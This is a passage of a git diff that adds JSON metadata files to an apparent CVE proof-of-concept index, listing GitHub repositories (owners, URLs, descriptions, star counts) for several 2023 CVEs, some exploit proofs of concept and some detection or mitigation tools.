"watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20573.json b/2023/CVE-2023-20573.json new file mode 100644 index 0000000000..b40a065f86 --- /dev/null +++ b/2023/CVE-2023-20573.json @@ -0,0 +1,33 @@ +[ + { + "id": 612644234, + "name": "cve-2023-20573-poc", + "full_name": "Freax13\/cve-2023-20573-poc", + "owner": { + "login": "Freax13", + "id": 14952658, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14952658?v=4", + "html_url": "https:\/\/github.com\/Freax13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Freax13\/cve-2023-20573-poc", + "description": null, + "fork": false, + "created_at": "2023-03-11T15:04:51Z", + "updated_at": "2024-11-27T03:27:39Z", + "pushed_at": "2024-01-09T21:11:58Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20593.json b/2023/CVE-2023-20593.json new file mode 100644 index 0000000000..e5f790da4a --- /dev/null +++ b/2023/CVE-2023-20593.json @@ -0,0 +1,37 @@ +[ + { + "id": 671214196, + "name": "stop-zenbleed-win", + "full_name": "sbaresearch\/stop-zenbleed-win", + "owner": { + "login": "sbaresearch", + "id": 1678129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1678129?v=4", + "html_url": "https:\/\/github.com\/sbaresearch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sbaresearch\/stop-zenbleed-win", + "description": "PowerShell script to apply Zenbleed (CVE-2023-20593) MSR workaround on Windows", + "fork": false, + "created_at": "2023-07-26T20:03:11Z", + "updated_at": "2023-09-08T12:14:54Z", + "pushed_at": "2023-07-31T09:21:45Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-20593", + "windows", + "zenbleed" + ], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20598.json b/2023/CVE-2023-20598.json new file mode 100644 index 0000000000..fc483df18b --- /dev/null +++ b/2023/CVE-2023-20598.json @@ -0,0 +1,33 @@ +[ + { + "id": 813857053, + "name": "CVE-2023-20598-PDFWKRNL", + "full_name": "H4rk3nz0\/CVE-2023-20598-PDFWKRNL", + "owner": { + "login": "H4rk3nz0", + "id": 54619779, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54619779?v=4", + "html_url": "https:\/\/github.com\/H4rk3nz0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H4rk3nz0\/CVE-2023-20598-PDFWKRNL", + "description": "CVE-2023-20598 Kernel Driver - Elevation of Privilege", + "fork": false, + "created_at": "2024-06-11T22:03:51Z", + "updated_at": "2024-11-21T05:21:54Z", + "pushed_at": "2024-06-13T21:34:45Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20860.json b/2023/CVE-2023-20860.json new file mode 100644 index 0000000000..7f156a3d68 --- /dev/null +++ b/2023/CVE-2023-20860.json @@ -0,0 +1,33 @@ +[ + { + "id": 618305558, + "name": "CVE-2023-20860", + "full_name": "limo520\/CVE-2023-20860", + "owner": { + "login": "limo520", + "id": 24580562, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24580562?v=4", + "html_url": "https:\/\/github.com\/limo520", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/limo520\/CVE-2023-20860", + "description": null, + "fork": false, + "created_at": "2023-03-24T07:23:52Z", + "updated_at": "2023-12-23T16:06:01Z", + "pushed_at": "2023-03-24T07:42:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20872.json b/2023/CVE-2023-20872.json new file mode 100644 index 0000000000..9bcee6856e --- /dev/null +++ b/2023/CVE-2023-20872.json @@ -0,0 +1,33 @@ +[ + { + "id": 830497211, + "name": "vmware-escape-CVE-2023-20872-poc", + "full_name": "ze0r\/vmware-escape-CVE-2023-20872-poc", + "owner": { + "login": "ze0r", + "id": 43227253, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43227253?v=4", + "html_url": "https:\/\/github.com\/ze0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ze0r\/vmware-escape-CVE-2023-20872-poc", + "description": null, + "fork": false, + "created_at": "2024-07-18T11:45:30Z", + "updated_at": "2024-07-23T02:46:15Z", + "pushed_at": "2024-07-19T14:01:31Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20887.json b/2023/CVE-2023-20887.json new file mode 100644 index 0000000000..cd205f65b0 --- /dev/null +++ b/2023/CVE-2023-20887.json @@ -0,0 +1,97 @@ +[ + { + "id": 653133276, + "name": "CVE-2023-20887", + "full_name": "sinsinology\/CVE-2023-20887", + "owner": { + "login": "sinsinology", + "id": 77316200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4", + "html_url": "https:\/\/github.com\/sinsinology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinsinology\/CVE-2023-20887", + "description": "VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)", + "fork": false, + "created_at": "2023-06-13T13:17:23Z", + "updated_at": "2024-11-15T16:26:25Z", + "pushed_at": "2023-06-13T14:39:17Z", + "stargazers_count": 233, + "watchers_count": 233, + "has_discussions": false, + "forks_count": 45, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-20887" + ], + "visibility": "public", + "forks": 45, + "watchers": 233, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 653490431, + "name": "CVE-2023-20887", + "full_name": "miko550\/CVE-2023-20887", + "owner": { + "login": "miko550", + "id": 83682793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83682793?v=4", + "html_url": "https:\/\/github.com\/miko550", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miko550\/CVE-2023-20887", + "description": "VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)", + "fork": false, + "created_at": "2023-06-14T06:50:00Z", + "updated_at": "2024-07-11T06:04:13Z", + "pushed_at": "2023-06-14T06:53:19Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 696042954, + "name": "CVE-2023-20887", + "full_name": "Malwareman007\/CVE-2023-20887", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2023-20887", + "description": "VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)", + "fork": false, + "created_at": "2023-09-25T00:41:45Z", + "updated_at": "2024-08-10T17:51:51Z", + "pushed_at": "2023-09-25T00:48:41Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20909.json b/2023/CVE-2023-20909.json new file mode 100644 index 0000000000..8e2f469acb --- /dev/null +++ b/2023/CVE-2023-20909.json @@ -0,0 +1,64 @@ +[ + { + "id": 730068512, + "name": "frameworks_base_AOSP10_r33_CVE-2023-20909", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-20909", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-20909", + "description": null, + "fork": false, + "created_at": "2023-12-11T06:14:11Z", + "updated_at": "2023-12-11T06:20:09Z", + "pushed_at": "2023-12-11T06:35:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 730110101, + "name": "platform_frameworks_base_AOSP10_r33_CVE-2023-20909", + "full_name": "Trinadh465\/platform_frameworks_base_AOSP10_r33_CVE-2023-20909", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/platform_frameworks_base_AOSP10_r33_CVE-2023-20909", + "description": null, + "fork": false, + "created_at": "2023-12-11T08:23:14Z", + "updated_at": "2023-12-11T08:23:15Z", + "pushed_at": "2023-12-11T08:23:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20911.json b/2023/CVE-2023-20911.json new file mode 100644 index 0000000000..69b36c05ce --- /dev/null +++ b/2023/CVE-2023-20911.json @@ -0,0 +1,33 @@ +[ + { + "id": 721630428, + "name": "frameworks_base_AOSP10_r33_CVE-2023-20911", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-20911", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-20911", + "description": null, + "fork": false, + "created_at": "2023-11-21T13:05:00Z", + "updated_at": "2023-11-21T13:13:02Z", + "pushed_at": "2023-11-23T05:03:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20918.json b/2023/CVE-2023-20918.json new file mode 100644 index 0000000000..43902260f9 --- /dev/null +++ b/2023/CVE-2023-20918.json @@ -0,0 +1,64 @@ +[ + { + "id": 699801559, + "name": "platform_frameworks_base_AOSP_10_r33_CVE-2023-20918", + "full_name": "pazhanivel07\/platform_frameworks_base_AOSP_10_r33_CVE-2023-20918", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/platform_frameworks_base_AOSP_10_r33_CVE-2023-20918", + "description": null, + "fork": false, + "created_at": "2023-10-03T11:21:35Z", + "updated_at": "2023-10-03T11:29:10Z", + "pushed_at": "2023-10-03T11:29:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 699813635, + "name": "platform_frameworks_base_CVE-2023-20918", + "full_name": "Trinadh465\/platform_frameworks_base_CVE-2023-20918", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/platform_frameworks_base_CVE-2023-20918", + "description": null, + "fork": false, + "created_at": "2023-10-03T11:52:16Z", + "updated_at": "2023-10-03T11:59:03Z", + "pushed_at": "2023-10-03T11:58:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20921.json b/2023/CVE-2023-20921.json new file mode 100644 index 0000000000..d34a158f43 --- /dev/null +++ b/2023/CVE-2023-20921.json @@ -0,0 +1,33 @@ +[ + { + "id": 724965419, + "name": "frameworks_base_android-6.0.1_r22_CVE-2023-20921", + "full_name": "Trinadh465\/frameworks_base_android-6.0.1_r22_CVE-2023-20921", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_android-6.0.1_r22_CVE-2023-20921", + "description": null, + "fork": false, + "created_at": "2023-11-29T06:42:43Z", + "updated_at": "2023-11-29T06:50:59Z", + "pushed_at": "2023-11-29T06:50:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20933.json b/2023/CVE-2023-20933.json new file mode 100644 index 0000000000..d7d23fc027 --- /dev/null +++ b/2023/CVE-2023-20933.json @@ -0,0 +1,64 @@ +[ + { + "id": 622830505, + "name": "frameworks_av_CVE-2023-20933", + "full_name": "Trinadh465\/frameworks_av_CVE-2023-20933", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_av_CVE-2023-20933", + "description": null, + "fork": false, + "created_at": "2023-04-03T06:41:47Z", + "updated_at": "2023-04-03T07:03:11Z", + "pushed_at": "2023-04-03T07:04:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 623806497, + "name": "platform_frameworks_av_AOSP10_r33_CVE-2023-20933", + "full_name": "hshivhare67\/platform_frameworks_av_AOSP10_r33_CVE-2023-20933", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_av_AOSP10_r33_CVE-2023-20933", + "description": null, + "fork": false, + "created_at": "2023-04-05T06:04:42Z", + "updated_at": "2023-04-05T06:26:28Z", + "pushed_at": "2023-04-05T06:27:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20943.json b/2023/CVE-2023-20943.json new file mode 100644 index 0000000000..ab468e2463 --- /dev/null +++ b/2023/CVE-2023-20943.json @@ -0,0 +1,64 @@ +[ + { + "id": 622942438, + "name": "frameworks_base_CVE-2023-20943", + "full_name": "Trinadh465\/frameworks_base_CVE-2023-20943", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_CVE-2023-20943", + "description": null, + "fork": false, + "created_at": "2023-04-03T11:32:21Z", + "updated_at": "2023-04-03T11:44:16Z", + "pushed_at": "2023-04-03T11:45:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 623922493, + "name": "platform_frameworks_base_AOSP10_r33_CVE-2023-20943", + "full_name": "hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2023-20943", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2023-20943", + "description": null, + "fork": false, + "created_at": "2023-04-05T11:24:29Z", + "updated_at": "2023-04-05T11:38:00Z", + "pushed_at": "2023-04-05T11:45:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20944.json b/2023/CVE-2023-20944.json new file mode 100644 index 0000000000..ebd7c394a5 --- /dev/null +++ b/2023/CVE-2023-20944.json @@ -0,0 +1,64 @@ +[ + { + "id": 622958638, + "name": "frameworks_base_CVE-2023-20944", + "full_name": "Trinadh465\/frameworks_base_CVE-2023-20944", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_CVE-2023-20944", + "description": null, + "fork": false, + "created_at": "2023-04-03T12:12:17Z", + "updated_at": "2023-04-03T12:19:44Z", + "pushed_at": "2023-04-03T12:19:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 623455012, + "name": "platform_frameworks_base_AOSP10_r33_CVE-2023-20944", + "full_name": "hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2023-20944", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_frameworks_base_AOSP10_r33_CVE-2023-20944", + "description": null, + "fork": false, + "created_at": "2023-04-04T12:07:19Z", + "updated_at": "2023-04-04T12:19:39Z", + "pushed_at": "2023-04-04T12:35:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20945.json b/2023/CVE-2023-20945.json new file mode 100644 index 0000000000..5e5034f99d --- /dev/null +++ b/2023/CVE-2023-20945.json @@ -0,0 +1,33 @@ +[ + { + "id": 824635242, + "name": "CVE-2023-20945", + "full_name": "Ailenchick\/CVE-2023-20945", + "owner": { + "login": "Ailenchick", + "id": 71263121, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71263121?v=4", + "html_url": "https:\/\/github.com\/Ailenchick", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ailenchick\/CVE-2023-20945", + "description": null, + "fork": false, + "created_at": "2024-07-05T15:03:40Z", + "updated_at": "2024-07-05T15:07:42Z", + "pushed_at": "2024-07-05T15:07:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20955.json b/2023/CVE-2023-20955.json new file mode 100644 index 0000000000..d02f33d008 --- /dev/null +++ b/2023/CVE-2023-20955.json @@ -0,0 +1,33 @@ +[ + { + "id": 710323089, + "name": "packages_apps_Settings_AOSP10_r33_CVE-2023-20955", + "full_name": "Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2023-20955", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2023-20955", + "description": null, + "fork": false, + "created_at": "2023-10-26T13:19:06Z", + "updated_at": "2023-10-26T13:22:14Z", + "pushed_at": "2023-10-26T13:22:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-20963.json b/2023/CVE-2023-20963.json new file mode 100644 index 0000000000..cb699b9668 --- /dev/null +++ b/2023/CVE-2023-20963.json @@ -0,0 +1,95 @@ +[ + { + "id": 652570287, + "name": "BadParcel", + "full_name": "pwnipc\/BadParcel", + "owner": { + "login": "pwnipc", + "id": 60155767, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60155767?v=4", + "html_url": "https:\/\/github.com\/pwnipc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pwnipc\/BadParcel", + "description": "CVE-2023-20963 PoC (Android WorkSource parcel\/unparcel logic mismatch)", + "fork": false, + "created_at": "2023-06-12T10:44:59Z", + "updated_at": "2024-11-23T16:13:22Z", + "pushed_at": "2024-04-27T20:15:24Z", + "stargazers_count": 55, + "watchers_count": 55, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 55, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 707608234, + "name": "frameworks_base_AOSP10_r33_CVE-2023-20963", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-20963", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2023-20963", + "description": null, + "fork": false, + "created_at": "2023-10-20T09:11:00Z", + "updated_at": "2023-10-20T09:17:03Z", + "pushed_at": "2023-10-20T09:16:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824634694, + "name": "CVE-2023-20963", + "full_name": "Ailenchick\/CVE-2023-20963", + "owner": { + "login": "Ailenchick", + "id": 71263121, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71263121?v=4", + "html_url": "https:\/\/github.com\/Ailenchick", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ailenchick\/CVE-2023-20963", + "description": null, + "fork": false, + "created_at": "2024-07-05T15:02:07Z", + "updated_at": "2024-07-05T15:15:12Z", + "pushed_at": "2024-07-05T15:02:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21036.json b/2023/CVE-2023-21036.json new file mode 100644 index 0000000000..77f9f7467e --- /dev/null +++ b/2023/CVE-2023-21036.json @@ -0,0 +1,136 @@ +[ + { + "id": 615901503, + "name": "AntiCropalypse", + "full_name": "qixils\/AntiCropalypse", + "owner": { + "login": "qixils", + "id": 13265322, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13265322?v=4", + "html_url": "https:\/\/github.com\/qixils", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qixils\/AntiCropalypse", + "description": "Discord bot for mitigating the aCropalypse vulnerability (CVE-2023-21036, CVE-2023-28303) by retroactively deleting vulnerable images", + "fork": false, + "created_at": "2023-03-19T02:15:23Z", + "updated_at": "2023-10-17T17:27:44Z", + "pushed_at": "2023-04-01T04:54:08Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "acropalypse", + "bot", + "discord", + "discord-bot", + "kotlin", + "mitigation" + ], + "visibility": "public", + "forks": 1, + "watchers": 21, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 617519255, + "name": "CVE-2023-21036", + "full_name": "infobyte\/CVE-2023-21036", + "owner": { + "login": "infobyte", + "id": 4226354, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4226354?v=4", + "html_url": "https:\/\/github.com\/infobyte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/infobyte\/CVE-2023-21036", + "description": "Detection and sanitization for Acropalypse Now - CVE-2023-21036", + "fork": false, + "created_at": "2023-03-22T14:59:42Z", + "updated_at": "2024-09-06T13:10:33Z", + "pushed_at": "2023-05-15T12:12:33Z", + "stargazers_count": 78, + "watchers_count": 78, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 78, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 618966092, + "name": "gocropalypse", + "full_name": "notaSWE\/gocropalypse", + "owner": { + "login": "notaSWE", + "id": 98667270, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98667270?v=4", + "html_url": "https:\/\/github.com\/notaSWE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/notaSWE\/gocropalypse", + "description": "CVE-2023-21036 detection in Go", + "fork": false, + "created_at": "2023-03-25T21:30:57Z", + "updated_at": "2023-03-25T21:40:24Z", + "pushed_at": "2023-03-27T02:11:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 622034666, + "name": "acropadetect", + "full_name": "lordofpipes\/acropadetect", + "owner": { + "login": "lordofpipes", + "id": 68424788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68424788?v=4", + "html_url": "https:\/\/github.com\/lordofpipes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lordofpipes\/acropadetect", + "description": "Web tool for detecting Acropalypse (CVE-2023-21036) https:\/\/lordofpipes.github.io\/acropadetect\/", + "fork": false, + "created_at": "2023-04-01T00:08:15Z", + "updated_at": "2023-04-04T13:41:37Z", + "pushed_at": "2023-04-01T06:50:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "acropalypse", + "cve-2023-21036" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21086.json b/2023/CVE-2023-21086.json new file mode 100644 index 0000000000..79419b12cf --- /dev/null +++ b/2023/CVE-2023-21086.json @@ -0,0 +1,33 @@ +[ + { 